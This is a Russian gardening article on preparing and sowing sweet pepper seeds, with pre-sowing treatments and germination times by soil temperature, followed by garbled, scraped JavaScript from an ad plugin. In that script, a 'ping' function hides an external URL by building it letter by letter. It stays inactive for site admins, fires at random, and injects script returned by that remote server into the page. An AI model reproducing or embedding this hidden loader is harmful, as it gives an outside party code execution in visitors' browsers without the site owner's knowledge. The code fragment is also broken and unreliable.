Любимый всеми сладкий перец, растущий на каждом огороде, требует тщательной подготовки к посадке. Много труда уходит у каждого огородника на получение отличного урожая. Чтобы получить качественную рассаду, надо знать через сколько дней всходит перец, в каких условиях лучше растет рассада и что требуется перцу на огороде для дружного плодоношения. Урожай зависит от качества семян, рассады и условий роста взрослых растений.

Биологическая характеристика семян

Сладкий перец имеет мелкие, желтоватые, плоскоокруглые семена диаметром 0,2—0,4 см. Масса 1 тыс. штук от 4 до 6 грамм. Всхожесть семян перца зависит от того, сколько лет они хранятся. Всхожесть сохраняется до 4 лет и составляет 60—80%. Лучше всего взойдут экземпляры первого года хранения.

Срок годности семян перца сильно зависят от условий хранения. Правильно хранить семена в бумажном конверте, завернутом в целлофановый пакет.

Главный враг – сырость. Необходимо обеспечить доступ кислорода для дыхания и отсутствие влаги. Продолжительность хранения для перца без потери всхожести равна 3 годам.

Как проверить всхожесть? Очень легко. Это надо сделать за неделю до посева. Десять семян замачивают на 3—4 суток в теплой воде, потом сажают в плошку с землей. Узнаем процент всхожести по количеству ростков после того, как сеянцы взошли.

Предпосевная обработка

На всхожесть влияет подготовительная подготовка и температура почвы. Крупные российские фирмы обрабатывают семена перца перед фасовкой в пакетики – их дезинфицируют, покрывают питательной и защитной оболочкой. Это не только улучшает хранение, но и увеличивает количество всходов.

Однако если семена перца не прошли обработку, их следует подготовить к посеву.

Предпосевная подготовка охватывает несколько этапов:

  • калибровка;
  • прогревание;
  • обеззараживание;
  • закаливание;
  • насыщение микроэлементами;
  • барботирование;
  • стимулирование активаторами роста.

Начинается предпосевная обработка с разбора семян в соленой воде. Опустив их в 5% соляной раствор, получим разделение жизнеспособных и пустых семечек. Целые тяжелые экземпляры опускаются, а нежизнеспособные плавают на поверхности. Их должны выбросить. После процедуры их промывают от остатков соли.

Обеззараживание семян проводят, поместив их на 20 минут в темный, насыщенный 1% раствор марганцовки. Марганцовку можно заменить перекисью водорода или препаратами Азотофитом-Р, Фитоспарин.

Вместо использования соляного раствора и марганцовки можно замочить семена на 20 минут в горячей воде (температура +50—60°C). Живые экземпляры опустятся на дно, а пустые всплывут. После прогревания семена надо сразу положить в холодную воду. Таким проверенным способом можно обеззаразить семена, отбраковать пустые и прогреть, чтобы они лучше проклюнулись.

Процедура закаливания обеспечивает устойчивость растений к колебаниям и понижению температуры.

Время проведения – не дольше 5—7 суток. Дело заключается в чередовании температур — днем семена держат при комнатной температуре, на ночь ставят в холодильник.

Прекрасные результаты показывает барботирование. На сутки их помещают в воду, через которую с помощью аквариумного компрессора пропускают кислород. Семена насыщаются кислородом, быстрее набухают и прорастают.

Важно! Не надо подвергать обработке импортные и гибридные семена перцев.

За день до сева нужно провести процесс замачивания. Их можно залить раствором микроэлементов — сок алоэ, настой золы, Био-Мастер, Гуми, борная кислота или стимуляторы роста:

  • Эпин-Экстра;
  • Циркон;
  • Гумат натрия.

Их проращивают и в талой воде. Для этого их выкладывают между слоями намоченной ткани, заворачивают в полиэтиленовый пакет и кладут рядом с батареей при температуре +25—28 °C.

Когда начинают появляться зародыши, их чуть-чуть подсушивают и срочно сажают в подготовленные емкости. Нельзя допускать, чтобы появились корешки. Проклевывающиеся нежные ростки цепляются за ткань и могут легко обломиться, что сильно задержит сроки развития растений. Прорастить таким способом перцы можно в течение 3—7 суток.

Очередность обработки следующая:

  • прогревание;
  • протравливание;
  • закаливание;
  • барботирование;
  • замачивание.

Важно! Если семена прошли предпосевную обработку, они не только быстрее проклевываются, будут дружно всходить, меньше болеть, но и обеспечат достойное количество и качество плодов.

Правила посадки

Посадка перца на рассаду начинается с посадки семян. Сроки зависят от наличия теплиц, парников и климата местности.

В середине января сажают перец в южных районах, высаживая в апреле рассаду в теплицы. В это время требуется искусственное подсвечивание рассады.

В середине февраля сажают перец на рассаду в центральных районах владельцы обогреваемых теплиц.

В начале марта сажают перец в центральных и северных районах, высаживая в мае—июне рассаду в необогреваемые теплицы, парники.

Семена должны проклюнуться, затем их сажают во влажную почву на глубину 0,5 см, слегка прикрыв сверху землей. После посадки емкость закрывают стеклом или пленкой и ждут всходы. Взойти семена могут и через 4 дня и через 21 день.

Сколько всходят семена перца, зависит от температуры воздуха и почвы:

  • при температуре почвы +28—32 °C перец взойдет через 4—7 дней после посева;
  • при температуре почвы +24—26 °C всходы появляются через 14—15 дней;
  • при температуре почвы +21—22 °C сеянцы появятся через 20—21 дней;
  • при температуре ниже +20 °C всходы после посева не появятся совсем.

На прорастание может повлиять перепад дневной и ночной температур, сквозняки, сухость почвы. Поэтому ответ на вопрос: «Через сколько всходит перец?» может быть разным. В среднем, получить всходы перца удается в течение 2—3 недель.

После того как сеянцы смогли взойти, температуру срочно понижают и сохраняют на уровне +15—17 °C в течение 4—6 дней. Тогда рассада не вытягивается и развивает крепкие корни. Затем сеянцы переносят в помещение с температурой +20—25 °C, которая сохраняется до высадки на грядки.

Главные условия того, насколько рано и дружно проросли семена, остаются:

  • правильная подготовка;
  • оптимальная температура для прорастания;
  • рыхлая, легкая и питательная почва;
  • достаточная влажность почвы.

От всхода до плодоношения перец растет от 90 до 160 дней. Из-за этого его выращивают через рассаду. Важно не только вырастить крепкую рассаду, но и не перерастить ее. Определить это просто — она успевает заложить плодики, стебель дервенеет. Такая рассада будет медленнее приживаться и позже отдавать урожай.
При пересадке рассада должна быть определенного возраста:

  • 45—50 дней для ранних сортов;
  • 50—55 дней для средних сортов;
  • 55—75 дней для поздних сортов.

Рассада, вошедшая в нужный возраст, имеет высоту 20—25 см, более 10 настоящих зеленых листьев, толстый стебель.

Заключение

Хранение, обеззараживание, замачивание семян, проклюнувшиеся и проросшие сеянцы, появление всходов и рост рассады – все требует внимания и труда. Каждый этап роста несет или угнетение или процветание растения. Многое зависит от опыта и внимания садовода.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};